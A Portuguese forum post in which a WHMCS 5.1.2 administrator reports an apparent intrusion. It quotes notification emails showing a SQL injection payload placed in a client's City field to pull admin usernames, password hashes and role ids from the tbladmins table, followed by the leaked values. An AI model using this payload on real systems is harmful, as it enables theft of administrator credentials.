Jump to content
Sign in to follow this  
Robert Birschener

Tentativa De Invasão Whmcs

Recommended Posts

Olá pessoa, boa tarde.

 

Hoje recebi um cadastro um tanto estranho no WHMCS (link do PDH), cadastro com letras repetidas (nome: fdgdfgd), email inválido, etc. Depois de cadastrar a pessoa alterou alguns campos, abaixou segue o primeiro e segundo email respectivamente do WHMCS (link do PDH) notificando a mudança:

 

Client ID: 1422 - aaadsfsdfsdf fgfdg has requested to change his/her details as indicated below:

City: 'fghfgh' to 'AES_ENCRYPT(1,1), address2=(SELECT * FROM (SELECT group_concat(username,0x3a,password,0x3a,roleid) FROM tbladmins) as x)'

If you are unhappy with any of the changes, you need to login and revert them - this is the only record of the old details.

 

####################################################

 

Client ID: 1422 - aaadsfsdfsdf fgfdg has requested to change his/her details as indicated below:

Address 2: 'NOME_DE_USUARIO:321bbdfaf845a62a42ec2dea17214bca:1,NOME_DE_USUARIO:1d5d56f61db6e03b6fc42bc3a168ac36:1,NOME_DE_USUARIO:23c084ac7681a1eeea72093d8a844806:3' to 'aaa'
City: 'OµÜÿ(%ϱT*Cé9' to 'aaa'

If you are unhappy with any of the changes, you need to login and revert them - this is the only record of the old details.

 

Sendo que no segundo email onde eu coloquei escrito NOME_DE_USUARIO são os usuários do meu WHMCS (link do PDH), fiquei bastante preocupado com isso. Já alterei todas as senhas por precaução, mas gostaria de saber se já aconteceu com alguém e se tem alguma solução, a minha versão do WHMCS é a 5.1.2.

Share this post


Link to post
Share on other sites
Guest
This topic is now closed to further replies.
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.




×
×
  • Create New...